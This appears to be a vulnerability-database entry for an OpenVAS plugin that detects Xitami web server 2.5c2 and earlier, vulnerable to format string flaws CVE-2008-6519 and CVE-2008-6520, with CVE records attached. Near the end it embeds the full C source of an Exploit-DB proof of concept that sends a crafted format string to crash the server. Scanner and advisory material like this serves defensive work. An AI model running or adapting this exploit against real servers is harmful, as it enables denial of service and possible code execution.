ID OPENVAS:900548 Type openvas Reporter Copyright (C) 2009 SecPod Modified 2017-01-31T00:00:00
Description
This host has Xitami web server installed and is prone to
Multiple Format String Vulnerabilities.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_xitami_mult_format_string_vuln.nasl 5148 2017-01-31 13:16:55Z teissa $
#
# Xitami Multiple Format String Vulnerabilities
#
# Authors:
# Nikita MR <rnikita@secpod.com>
#
# Copyright (c) 2009 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
tag_impact = "Successful exploitation will allow remote attackers to execute
arbitrary code and can lead to application crash.
Impact Level: Application";
tag_affected = "Xitami version 2.5c2 and prior.";
tag_insight ="
- Error exists while handling a format string specifiers in a Long Running
Web Process (LRWP) request, which triggers incorrect logging code involving
the sendfmt function in the SMT kernel.
- Error in Server Side Includes (SSI) filter when processes requests with
specially crafted URIs ending in .ssi, .shtm, or .shtml, which triggers
incorrect logging code involving the sendfmt function in the SMT kernel.";
tag_solution = "No solution or patch was made available for at least one year
since disclosure of this vulnerability. Likely none will be provided anymore.
General solution options are to upgrade to a newer release, disable respective
features, remove the product or replace the product by another one.";
tag_summary = "This host has Xitami web server installed and is prone to
Multiple Format String Vulnerabilities.";
if(description)
{
script_id(900548);
script_version("$Revision: 5148 $");
script_tag(name:"last_modification", value:"$Date: 2017-01-31 14:16:55 +0100 (Tue, 31 Jan 2017) $");
script_tag(name:"creation_date", value:"2009-05-06 08:04:28 +0200 (Wed, 06 May 2009)");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_cve_id("CVE-2008-6519", "CVE-2008-6520");
script_bugtraq_id(28603);
script_name("Xitami Multiple Format String Vulnerabilities");
script_xref(name : "URL" , value : "http://www.milw0rm.com/exploits/5354");
script_xref(name : "URL" , value : "http://xforce.iss.net/xforce/xfdb/41644");
script_xref(name : "URL" , value : "http://xforce.iss.net/xforce/xfdb/41645");
script_tag(name:"qod_type", value:"remote_banner");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2009 SecPod");
script_family("Denial of Service");
script_dependencies("secpod_xitami_server_detect.nasl");
script_require_keys("Xitami/Ver");
script_tag(name : "impact" , value : tag_impact);
script_tag(name : "affected" , value : tag_affected);
script_tag(name : "insight" , value : tag_insight);
script_tag(name : "solution" , value : tag_solution);
script_tag(name : "summary" , value : tag_summary);
script_tag(name:"solution_type", value:"WillNotFix");
exit(0);
}
include("version_func.inc");
xVer = get_kb_item("Xitami/Ver");
if(xVer == NULL){
exit(0);
}
if(version_is_less_equal(version:xVer, test_version:"2.5.c2")){
security_message(0);
}
{"id": "OPENVAS:900548", "type": "openvas", "bulletinFamily": "scanner", "title": "Xitami Multiple Format String Vulnerabilities", "description": "This host has Xitami web server installed and is prone to\nMultiple Format String Vulnerabilities.", "published": "2009-05-06T00:00:00", "modified": "2017-01-31T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=900548", "reporter": "Copyright (C) 2009 SecPod", "references": ["http://xforce.iss.net/xforce/xfdb/41644", "http://www.milw0rm.com/exploits/5354", "http://xforce.iss.net/xforce/xfdb/41645"], "cvelist": ["CVE-2008-6519", "CVE-2008-6520"], "lastseen": "2017-07-02T21:13:49", "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE", "modified": "2017-07-02T21:13:49", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2008-6520", "CVE-2008-6519"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310900548"]}, {"type": "exploitdb", "idList": ["EDB-ID:5354"]}], "modified": "2017-07-02T21:13:49", "rev": 2}, "vulnersScore": 7.5}, "pluginID": "900548", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_xitami_mult_format_string_vuln.nasl 5148 2017-01-31 13:16:55Z teissa $\n#\n# Xitami Multiple Format String Vulnerabilities\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow remote attackers to execute\narbitrary code and can lead to application crash.\n\nImpact Level: Application\";\n\ntag_affected = \"Xitami version 2.5c2 and prior.\";\n\ntag_insight =\"\n- Error exists while handling a format string specifiers in a Long Running\n Web Process (LRWP) request, which triggers incorrect logging code involving\n the sendfmt function in the SMT kernel.\n- Error in Server Side Includes (SSI) filter when processes requests with\n specially crafted URIs ending in .ssi, .shtm, or .shtml, which triggers\n incorrect logging code involving the sendfmt function in the SMT kernel.\";\n\ntag_solution = \"No solution or patch was made available for at least one year\nsince disclosure of this vulnerability. Likely none will be provided anymore.\nGeneral solution options are to upgrade to a newer release, disable respective\nfeatures, remove the product or replace the product by another one.\";\n\ntag_summary = \"This host has Xitami web server installed and is prone to\nMultiple Format String Vulnerabilities.\";\n\nif(description)\n{\n script_id(900548);\n script_version(\"$Revision: 5148 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-01-31 14:16:55 +0100 (Tue, 31 Jan 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-06 08:04:28 +0200 (Wed, 06 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-6519\", \"CVE-2008-6520\");\n script_bugtraq_id(28603);\n script_name(\"Xitami Multiple Format String Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://www.milw0rm.com/exploits/5354\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/41644\");\n script_xref(name : \"URL\" , value : \"http://xforce.iss.net/xforce/xfdb/41645\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_xitami_server_detect.nasl\");\n script_require_keys(\"Xitami/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nxVer = get_kb_item(\"Xitami/Ver\");\nif(xVer == NULL){\n exit(0);\n}\n\nif(version_is_less_equal(version:xVer, test_version:\"2.5.c2\")){\n security_message(0);\n}\n", "naslFamily": "Denial of Service"}
{"cve": [{"lastseen": "2021-02-02T05:35:20", "description": "Multiple format string vulnerabilities in the SSI filter in Xitami Web Server 2.5c2, and possibly other versions, allow remote attackers to cause a denial of service (daemon crash) and possibly execute arbitrary code via format string specifiers in a URI that ends in (1) .ssi, (2) .shtm, or (3) .shtml, which triggers incorrect logging code involving the sendfmt function in the SMT kernel.", "edition": 4, "cvss3": {}, "published": "2009-03-25T18:30:00", "title": "CVE-2008-6520", "type": "cve", "cwe": ["CWE-134"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-6520"], "modified": "2017-08-17T01:29:00", "cpe": ["cpe:/a:imatix:xitami:2.5c2"], "id": "CVE-2008-6520", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6520", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:imatix:xitami:2.5c2:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:20", "description": "Format string vulnerability in Xitami Web Server 2.2a through 2.5c2, and possibly other versions, allows remote attackers to cause a denial of service (daemon crash) and possibly execute arbitrary code via format string specifiers in a Long Running Web Process (LRWP) request, which triggers incorrect logging code involving the sendfmt function in the SMT kernel.", "edition": 4, "cvss3": {}, "published": "2009-03-25T18:30:00", "title": "CVE-2008-6519", "type": "cve", "cwe": ["CWE-134"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-6519"], "modified": "2017-09-29T01:33:00", "cpe": ["cpe:/a:imatix:xitami:2.5", "cpe:/a:imatix:xitami:2.4d7", "cpe:/a:imatix:xitami:2.4", "cpe:/a:imatix:xitami:2.2a", "cpe:/a:imatix:xitami:2.5c2"], "id": "CVE-2008-6519", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-6519", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:imatix:xitami:2.4:*:*:*:*:*:*:*", "cpe:2.3:a:imatix:xitami:2.4d7:*:*:*:*:*:*:*", "cpe:2.3:a:imatix:xitami:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:imatix:xitami:2.4d7:*:windows:*:*:*:*:*", "cpe:2.3:a:imatix:xitami:2.2a:*:*:*:*:*:*:*", "cpe:2.3:a:imatix:xitami:2.5c2:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:40:21", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-6519", "CVE-2008-6520"], "description": "This host has Xitami web server installed and is prone to\n Multiple Format String Vulnerabilities.", "modified": "2018-09-15T00:00:00", "published": "2009-05-06T00:00:00", "id": "OPENVAS:1361412562310900548", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900548", "type": "openvas", "title": "Xitami Multiple Format String Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_xitami_mult_format_string_vuln.nasl 11410 2018-09-15 20:11:00Z cfischer $\n#\n# Xitami Multiple Format String Vulnerabilities\n#\n# Authors:\n# Nikita MR <rnikita@secpod.com>\n#\n# Copyright (c) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:imatix:xitami:server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900548\");\n script_version(\"$Revision: 11410 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-15 22:11:00 +0200 (Sat, 15 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-06 08:04:28 +0200 (Wed, 06 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2008-6519\", \"CVE-2008-6520\");\n script_bugtraq_id(28603);\n script_name(\"Xitami Multiple Format String Vulnerabilities\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_xitami_server_detect.nasl\");\n script_mandatory_keys(\"xitami/version\");\n\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/5354\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/41644\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/41645\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute\n arbitrary code and can lead to application crash.\");\n\n script_tag(name:\"affected\", value:\"Xitami version 2.5c2 and prior.\");\n\n script_tag(name:\"insight\", value:\"- Error exists while handling a format string specifiers in a Long Running\n Web Process (LRWP) request, which triggers incorrect logging code involving\n the sendfmt function in the SMT kernel.\n\n - Error in Server Side Includes (SSI) filter when processes requests with\n specially crafted URIs ending in .ssi, .shtm, or .shtml, which triggers\n incorrect logging code involving the sendfmt function in the SMT kernel.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"This host has Xitami web server installed and is prone to\n Multiple Format String Vulnerabilities.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nif( ! vers = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( version_is_less_equal( version:vers, test_version:\"2.5c2\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"WillNotFix\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-01-31T22:00:38", "description": "Xitami Web Server v2.5c2 LRWP Processing Format String PoC. CVE-2008-6519. Dos exploit for windows platform", "published": "2008-04-03T00:00:00", "type": "exploitdb", "title": "Xitami Web Server 2.5c2 - LRWP Processing Format String PoC", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-6519"], "modified": "2008-04-03T00:00:00", "id": "EDB-ID:5354", "href": "https://www.exploit-db.com/exploits/5354/", "sourceData": "/**\r\n *\r\n * PoC exploit for Xitami Web Server v2.5c2 LRWP processing format string bug\r\n * Advisory is available at: http://www.bratax.be/advisories/b013.html\r\n * (multiple vulnerabilities! check it out!)\r\n *\r\n * @author: bratax\r\n * @url: http://www.bratax.be/\r\n * @email: bratax@gmail.com\r\n *\r\n * Thanks to BuzzDee for learning me how to use reverse code engineering to\r\n * find bugs & thanks to DiabloHorn as well ;-)\r\n * Greetz to NR!\r\n *\r\n**/\r\n\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <winsock2.h>\r\n\r\n#pragma comment(lib, \"ws2_32.lib\")\r\n#define PORT 81 // target port\r\n\r\nint main(int argc, char *argv[]){\r\n\r\n int sockfd;\r\n struct hostent *he;\r\n struct sockaddr_in their_addr;\r\n WSADATA wsaData;\r\n char formatstring[250];\r\n\r\n if (argc != 2){\r\n printf(\"\\nXitami Web Server 2.5c2\\n\" );\r\n printf(\"Format String PoC by bratax - http://www.bratax.be/\\n\\n\");\r\n printf(\"[+] tested on WinXP Pro SP2 & Vista\\n\");\r\n printf(\"[+] usage: %s <hostname>\\n\\n\", argv[0]);\r\n return -1;\r\n }\r\n\r\n if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {\r\n fprintf(stderr, \"WSAStartup failed.\\n\");\r\n return -1;\r\n }\r\n\r\n if ((he=gethostbyname(argv[1])) == NULL){ // get the host info\r\n perror(\"gethoscattbyname\");\r\n return -1;\r\n }\r\n\r\n if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){\r\n perror(\"socket\");\r\n return -1;\r\n }\r\n\r\n their_addr.sin_family = AF_INET; // host byte order\r\n their_addr.sin_port = htons(PORT); // short, network byte order\r\n their_addr.sin_addr = *((struct in_addr *)he->h_addr);\r\n memset(&(their_addr.sin_zero), '\\0', 8); // zero the rest of the struct\r\n\r\n if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1){\r\n printf(\"[-] Connect failed.\\n\");\r\n closesocket(sockfd);\r\n return -1;\r\n }\r\n\r\n printf(\"[+] Server is listening...\\n\");\r\n\r\n Sleep(1000);\r\n\r\n /*\r\n setup format string request:\r\n %s*100 + \\xFF + somestring + \\xFF (program termination)\r\n or:\r\n %n + \\xFF + somestring + \\xFF (program crash)\r\n */\r\n\r\n memset(formatstring,'\\x41', sizeof(formatstring));\r\n for (int i = 0; i<200; i+=2){\r\n memcpy(formatstring+i, \"%s\", 2);\r\n }\r\n memcpy(formatstring+200, \"\\xFF\", 1);\r\n memcpy(formatstring+249, \"\\xFF\", 1);\r\n\r\n printf(\"[+] Sending format string request...\");\r\n Sleep(2000);\r\n\r\n if (send(sockfd,formatstring,sizeof(formatstring),0) == -1) {\r\n Sleep(2000);\r\n printf(\"failed! Exiting...\\n\");\r\n closesocket(sockfd);\r\n WSACleanup();\r\n return -1;\r\n }\r\n\r\n Sleep(2000);\r\n closesocket(sockfd);\r\n printf(\"done.\\n\");\r\n\r\n\r\n return 0;\r\n}\r\n\r\n// milw0rm.com [2008-04-03]\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/5354/"}]}